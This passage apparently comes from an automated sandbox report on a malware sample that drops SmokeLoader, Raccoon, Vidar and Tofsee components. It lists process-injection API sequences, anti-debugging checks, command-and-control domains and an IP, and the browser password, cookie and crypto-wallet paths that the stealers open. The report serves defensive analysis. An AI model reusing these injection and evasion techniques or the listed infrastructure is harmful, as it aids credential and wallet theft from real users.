Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_0043E07C FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,	22_2_0043E07C
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_0045EACD FindFirstFileExW,	22_2_0045EACD
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_0040A24D __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,	25_2_0040A24D
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_004625F7 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,	25_2_004625F7
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_00412D96 _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,	25_2_00412D96
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_00404F13 __EH_prolog3,_memset,_memset,_memset,_memset,lstrcpyW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,FindClose,_memset,_memset,_memset,_memset,_memset,_memset,_memset,_memset,FindClose,	25_2_00404F13
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_00405A45 __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,	25_2_00405A45

Source: C:\Users\user\Desktop\GzsKHwvBmG.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging:

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Show sources

Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hhiwwui	System information queried: CodeIntegrityInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\E61.exe

25_2_00412190

Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Code function: 1_2_02DE0042 push dword ptr fs:[00000030h]	1_2_02DE0042
Source: C:\Users\user\AppData\Roaming\hhiwwui	Code function: 17_2_02F37F53 push dword ptr fs:[00000030h]	17_2_02F37F53
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_004590DF mov eax, dword ptr fs:[00000030h]	22_2_004590DF
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_00459154 mov eax, dword ptr fs:[00000030h]	22_2_00459154
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_00459123 mov eax, dword ptr fs:[00000030h]	22_2_00459123

Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hhiwwui	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\E61.exe

Code function: 25_2_0046E577 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

25_2_0046E577

Source: C:\Users\user\AppData\Local\Temp\49B.exe

Code function: 22_2_0040B9E2 __EH_prolog,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

22_2_0040B9E2

Source: C:\Users\user\AppData\Local\Temp\B72.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\GzsKHwvBmG.exe

Code function: 3_1_00402833 LdrLoadDll,

3_1_00402833

Source: C:\Users\user\AppData\Local\Temp\B72.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\E61.exe

Code function: 25_2_0046E577 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

25_2_0046E577

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\explorer.exe	Domain query: readinglistforaugust3.xyz
Source: C:\Windows\explorer.exe	Network Connect: 185.49.70.90 32	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: readinglistforaugust2.xyz
Source: C:\Windows\explorer.exe	Domain query: readinglistforaugust1.xyz

Benign windows process drops PE files

Show sources

Source: C:\Windows\explorer.exe

File created: hhiwwui.6.dr

Jump to dropped file

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hhiwwui	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hhiwwui	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\GzsKHwvBmG.exe

Memory written: C:\Users\user\Desktop\GzsKHwvBmG.exe base: 400000 value starts with: 4D5A

Jump to behavior

Contains functionality to inject code into remote processes

Show sources

Source: C:\Users\user\Desktop\GzsKHwvBmG.exe

Code function: 1_2_02DE0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,

1_2_02DE0110

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Thread created: C:\Windows\explorer.exe EIP: 4F41EEC			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hhiwwui	Thread created: unknown EIP: 4F71EEC			Jump to behavior

Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Process created: C:\Users\user\Desktop\GzsKHwvBmG.exe 'C:\Users\user\Desktop\GzsKHwvBmG.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hhiwwui	Process created: C:\Users\user\AppData\Roaming\hhiwwui C:\Users\user\AppData\Roaming\hhiwwui	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3092 -ip 3092
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3092 -ip 3092
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 752
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3092 -ip 3092
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Process created: unknown unknown

Source: explorer.exe, 00000006.00000000.295921372.0000000001640000.00000002.00000001.sdmp, 49B.exe, 00000016.00000000.398270206.0000000003510000.00000002.00000001.sdmp, B72.exe, 00000017.00000002.652444443.0000000001CD0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.295921372.0000000001640000.00000002.00000001.sdmp, 49B.exe, 00000016.00000000.398270206.0000000003510000.00000002.00000001.sdmp, B72.exe, 00000017.00000002.652444443.0000000001CD0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.295921372.0000000001640000.00000002.00000001.sdmp, 49B.exe, 00000016.00000000.398270206.0000000003510000.00000002.00000001.sdmp, B72.exe, 00000017.00000002.652444443.0000000001CD0000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000006.00000000.295291576.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000006.00000000.295921372.0000000001640000.00000002.00000001.sdmp, 49B.exe, 00000016.00000000.398270206.0000000003510000.00000002.00000001.sdmp, B72.exe, 00000017.00000002.652444443.0000000001CD0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000006.00000000.295921372.0000000001640000.00000002.00000001.sdmp, 49B.exe, 00000016.00000000.398270206.0000000003510000.00000002.00000001.sdmp, B72.exe, 00000017.00000002.652444443.0000000001CD0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize,	22_2_0042B4DB
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,	22_2_004368D6
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: __EH_prolog3,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,_memset,LocalFree,	25_2_0045F961
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	25_2_004780AC
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	25_2_0047816C
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	25_2_004781D3
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	25_2_0047820F
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	25_2_0047660B
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	25_2_004768B6
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	25_2_0047CAF9
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	25_2_0047CBD3

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\B72.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Queries volume information: C:\ProgramData\GXAV7FDLT69HG7EAUAWY4TT6N\files\Autofill\Google Chrome_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Queries volume information: C:\ProgramData\GXAV7FDLT69HG7EAUAWY4TT6N\files\CC\Google Chrome_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Queries volume information: C:\ProgramData\GXAV7FDLT69HG7EAUAWY4TT6N\files\Cookies\Edge_Cookies.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Queries volume information: C:\ProgramData\GXAV7FDLT69HG7EAUAWY4TT6N\files\Cookies\Google Chrome_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Queries volume information: C:\ProgramData\GXAV7FDLT69HG7EAUAWY4TT6N\files\Cookies\IE_Cookies.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Queries volume information: C:\ProgramData\GXAV7FDLT69HG7EAUAWY4TT6N\files\Downloads\Google Chrome_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Queries volume information: C:\ProgramData\GXAV7FDLT69HG7EAUAWY4TT6N\files\Files\11111.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Queries volume information: C:\ProgramData\GXAV7FDLT69HG7EAUAWY4TT6N\files\History\Google Chrome_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Queries volume information: C:\ProgramData\GXAV7FDLT69HG7EAUAWY4TT6N\files\information.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Queries volume information: C:\ProgramData\GXAV7FDLT69HG7EAUAWY4TT6N\files\passwords.txt VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\E61.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\GzsKHwvBmG.exe

Code function: 1_2_00405A5D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

1_2_00405A5D

Source: C:\Users\user\AppData\Local\Temp\49B.exe

Code function: 22_2_004362A8 __EH_prolog,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor,

22_2_004362A8

Source: C:\Users\user\AppData\Local\Temp\49B.exe

Code function: 22_2_00434E25 GetUserNameA,

22_2_00434E25

Source: C:\Users\user\AppData\Local\Temp\E61.exe

Code function: 25_2_0040E962 _memset,GetVersionExA,

25_2_0040E962

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Source: svchost.exe, 0000000D.00000002.582529774.000002115563D000.00000004.00000001.sdmp	Binary or memory string: *@\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
Source: svchost.exe, 0000000D.00000002.584479463.0000021155702000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information:

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 00000027.00000002.601848015.0000000002DA1000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.559576605.0000000000371000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.GzsKHwvBmG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.GzsKHwvBmG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.hhiwwui.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.1.hhiwwui.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.308302159.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.370106041.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.308352184.00000000006A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.370292791.00000000005E1000.00000004.00000001.sdmp, type: MEMORY

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 22.0.49B.exe.4920e50.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.49B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.49B.exe.4920e50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.400000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.49B.exe.4920e50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.400000.19.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.49B.exe.49d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.20.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.49B.exe.49d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000000.410473881.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.409608494.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.382884263.00000000049D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.393584726.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.419422214.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.400296473.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.416098242.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.650305946.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.424554766.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.465918061.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.398407236.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.448938859.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.459235582.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.436435697.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 49B.exe PID: 3092, type: MEMORYSTR

Yara detected Vidar stealer

Show sources

Source: Yara match	File source: 25.2.E61.exe.40a0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.E61.exe.4170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.E61.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.E61.exe.40a0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.E61.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.E61.exe.4170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.458901650.00000000040A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.389564548.0000000004170000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: E61.exe PID: 2964, type: MEMORYSTR

Yara detected Tofsee

Show sources

Source: Yara match	File source: 00000021.00000002.448334222.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.415728419.0000000002E80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.452136750.0000000002E40000.00000040.00000001.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\E61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\E61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\E61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\E61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Tries to steal Crypto Currency Wallets

Show sources

Source: C:\Users\user\AppData\Local\Temp\E61.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\E61.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\E61.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\E61.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\E61.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\E61.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\E61.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\E61.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\E61.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
